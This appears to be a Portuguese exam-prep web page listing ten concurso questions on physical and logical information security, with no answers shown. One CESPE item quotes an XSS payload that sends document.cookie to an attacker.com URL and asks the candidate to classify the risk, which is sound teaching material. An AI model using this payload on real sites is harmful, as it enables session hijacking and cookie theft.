Logo
QuestõesDisciplinasBancasDashboardSimuladosCadernoRaio-XBlog
Logo Questionei

Links Úteis

  • Início
  • Questões
  • Disciplinas
  • Simulados

Legal

  • Termos de Uso
  • Termos de Adesão
  • Política de Privacidade

Disciplinas

  • Matemática
  • Informática
  • Português
  • Raciocínio Lógico
  • Direito Administrativo

Bancas

  • FGV
  • CESPE
  • VUNESP
  • FCC
  • CESGRANRIO

© 2026 Questionei. Todos os direitos reservados.

Feito com ❤️ para educação

Logoquestionei.com
  1. Início/
  2. Questões

Questões

Explore as questões disponíveis e prepare-se para seus estudos!

Filtros

Disciplina
Tema
Cargo
Dificuldade
Banca
Ano
Organização

Excluir questões:

Filtrar por:

Seus filtros aparecerão aqui.

10 por página

1

457941200945173
Ano: 2017Banca: CESPE / CEBRASPEOrganização: SEDFDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica

Relativamente a segurança da informação, julgue o item subsequente.

No contexto da segurança física, é classificado como de risco intermediário um ambiente computacional organizacional que, sem ter asseguradas as condições mínimas de funcionamento e processamento das informações, seja capaz de levar a organização a ter sérios problemas ou incorrer em grandes prejuízos.

Gabarito comentado
Anotações
Marcar para revisão

2

457941201893447
Ano: 2018Banca: INSTITUTO AOCPOrganização: UFOBDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica
Para alguns especialistas, a informação é considerada o ativo mais valioso das organizações. A segurança física e lógica, no que diz respeito à proteção das informações, é preocupação dos profissionais da Segurança da Informação. Sobre esse assunto, julgue o item a seguir.

Não é papel do usuário do computador se preocupar com a segurança da informação, quando uma organização possui uma equipe dedicada a tratar exclusivamente desse assunto.
Gabarito comentado
Anotações
Marcar para revisão

3

457941201014643
Ano: 2018Banca: FCCOrganização: SABESPDisciplina: Segurança da Informação e CriptografiaTemas: Medidas de Segurança | Segurança Física e Lógica

Visando aumentar a segurança das informações, um Analista propôs a utilização dos seguintes mecanismos de proteção lógica, gerenciamento de acesso e proteção física:


I. contempla antivírus, filtros de pacotes, controle de acesso wireless, suporte à Virtual Private Network (VPN) e controle de intrusões na rede, chegando a gerar relatórios com diagnóstico de possíveis ameaças lógicas às quais o centro de dados possa estar vulnerável.

II. submete o usuário a mecanismos de autenticação combinados, pertencentes pelo menos às categorias: conhecimento (something you know), possessão (something you have) e herança (something you are).

III. visa fornecer energia para todos os equipamentos, sendo composto por conjuntos de nobreaks, baterias, inversores e retificadores. Os nobreaks redundantes irão assegurar o suprimento contínuo de energia, mesmo em caso de falha de transformadores ou falta de energia elétrica e as baterias são dimensionadas para garantir uma autonomia por um período mínimo de tempo.


Os mecanismos I, II e III se referem, correta e respectivamente, a

Gabarito comentado
Anotações
Marcar para revisão

4

457941200784561
Ano: 2023Banca: FUNDATECOrganização: PROCERGSDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica
Tem sido amplamente usado(a) em tolerância a faltas para garantir a disponibilidade e a confiabilidade de serviços distribuídos. A ideia básica consiste em distribuir cópias do código e dos dados de determinado serviço por um conjunto de servidores. Esse conceito trata-se de? 
Gabarito comentado
Anotações
Marcar para revisão

5

457941200210514
Ano: 2024Banca: FURBOrganização: Prefeitura de Guabiruba - SCDisciplina: Segurança da Informação e CriptografiaTemas: Fundamentos de Segurança | Segurança Física e Lógica
No contexto da segurança eletrônica, é essencial compreender os princípios do manuseio e da configuração adequados dos equipamentos para garantir a eficiência da vigilância e a proteção dos ativos. Nesse contexto, analise as proposições a seguir sobre o manuseio e configuração de equipamentos de vigilância eletrônica:


I. A configuração correta dos ângulos de visão das câmeras é fundamental para cobrir áreas estratégicas sem deixar pontos cegos.


II. A manutenção preventiva dos equipamentos de segurança pode ser realizada anualmente, independentemente das condições de uso e exposição ambiental.


III. Testes regulares dos sistemas de monitoramento são desnecessários se os equipamentos forem de alta qualidade e de marcas reconhecidas.


É correto o que se afirma em: 
Gabarito comentado
Anotações
Marcar para revisão

6

457941200362765
Ano: 2023Banca: FGVOrganização: TJ-RNDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica
A analista Joana é responsável pela administração do servidor RLServ, que executa o RHEL 8 (Red Hat Enterprise Linux). Joana verifica periodicamente, de forma proativa, se as tentativas de login no RLServ, tanto locais quanto remotas, estão coerentes com os usuários sabidamente atendidos pelo RLServ. Para efetuar esta verificação, Joana consulta o log de autenticações gerado pelo serviço Rsyslog.

Logo, Joana consulta o log de autenticações disponível no RHEL, por padrão, no caminho /var/log/:
Gabarito comentado
Anotações
Marcar para revisão

7

457941200404974
Ano: 2018Banca: INSTITUTO AOCPOrganização: UNIRDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica
Segurança da informação é o conjunto de orientações, normas, procedimentos, políticas e demais ações que tem por objetivo proteger o recurso informação, possibilitando que o negócio da organização seja realizado e a sua missão seja alcançada. A segurança da informação existe para minimizar os riscos do negócio em relação à dependência do uso dos recursos de informação para o funcionamento da organização. Sem a informação ou com uma incorreta, o negócio pode ter perdas que comprometam o seu funcionamento e o retorno de investimento dos acionistas. Em relação às Políticas de Segurança, julgue, como VERDADEIRO ou FALSO, o item a seguir.
Quanto à identificação em um sistema computacional, essa informação deve ser sigilosa. No ambiente computacional, o usuário é identificado por alguma informação que sabe (senha), possui (cartão, token) ou é (característica física-biometria).
Gabarito comentado
Anotações
Marcar para revisão

8

457941201010328
Ano: 2020Banca: CESPE / CEBRASPEOrganização: Ministério da EconomiaDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

Gabarito comentado
Anotações
Marcar para revisão

9

457941201949886
Ano: 2025Banca: FGVOrganização: DPE-RODisciplina: Segurança da Informação e CriptografiaTemas: Backup de Segurança da Informação | Segurança Física e Lógica

No gerenciamento de arquivos audiovisuais, existem estratégias para evitar perda de dados e garantir a integridade dos arquivos.


Nesse contexto, analise as afirmativas a seguir:


I. Armazenar arquivos de áudio e vídeo em um único servidor local proporciona proteção suficiente contra falhas físicas, incêndios, roubo, desastres naturais e ataques cibernéticos.


II. Recomenda-se criar backups em múltiplos locais e armazenamento redundante para arquivos de vídeo e áudio, garantindo proteção contra falhas de hardware, erros humanos e ataques cibernéticos.


III. É aconselhável utilizar pendrive como principal meio de backup, pois são portáteis e permitem acesso rápido aos arquivos em qualquer local.


Está correto o que se afirma em:

Gabarito comentado
Anotações
Marcar para revisão

10

457941200724203
Ano: 2023Banca: FUNDATECOrganização: PROCERGSDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica
Os mecanismos de segurança são os meios através dos quais garante-se que uma determinada política está sendo cumprida e usa-se essas ferramentas para implementar uma política de segurança. Esses podem ser procedimentos físicos como também implementados em hardware ou software. Qual opção abaixo NÃO pode ser considerada um mecanismo de segurança?
Gabarito comentado
Anotações
Marcar para revisão
..
Logoquestionei.com